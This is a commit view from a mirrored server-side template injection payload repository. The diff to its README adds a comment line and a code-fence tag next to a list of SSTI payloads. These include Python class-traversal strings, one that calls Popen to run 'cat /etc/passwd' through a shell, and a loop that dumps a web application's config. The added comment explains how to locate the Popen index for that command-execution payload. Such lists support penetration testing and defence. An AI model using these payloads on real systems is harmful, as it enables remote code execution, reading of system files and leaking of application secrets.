External/ssti-payloads
1
0
Fork 0
mirror of https://github.com/payloadbox/ssti-payloads.git synced 2025-12-29 16:15:07 +00:00
Code Issues Packages Projects Releases Wiki Activity

Enhancements

Browse Source
This commit is contained in:
Ayham Al-Ali
2023-01-07 04:25:03 +03:00
parent 9c6f8dec44
commit 043503b4fd
1 changed files with 2 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
README.md
View File

@@ -17,7 +17,7 @@ Even in cases where full remote code execution is not possible, an attacker can
#### Payloads : #### Payloads :
``` ```py
{{2*2}}[[3*3]] {{2*2}}[[3*3]]
{{3*3}} {{3*3}}
{{3*'3'}} {{3*'3'}}
@@ -33,6 +33,7 @@ ${{3*3}}
{{ [].class.base.subclasses() }} {{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}} {{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }} {{ ''.__class__.__mro__[2].__subclasses__() }}
{{''.__class__.__base__.__subclasses__()}} # Search for Popen process, use payload below change 227 to index of Popen
{{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}} {{''.__class__.__base__.__subclasses__()[227]('cat /etc/passwd', shell=True, stdout=-1).communicate()}}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %} {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{{'a'.toUpperCase()}} {{'a'.toUpperCase()}}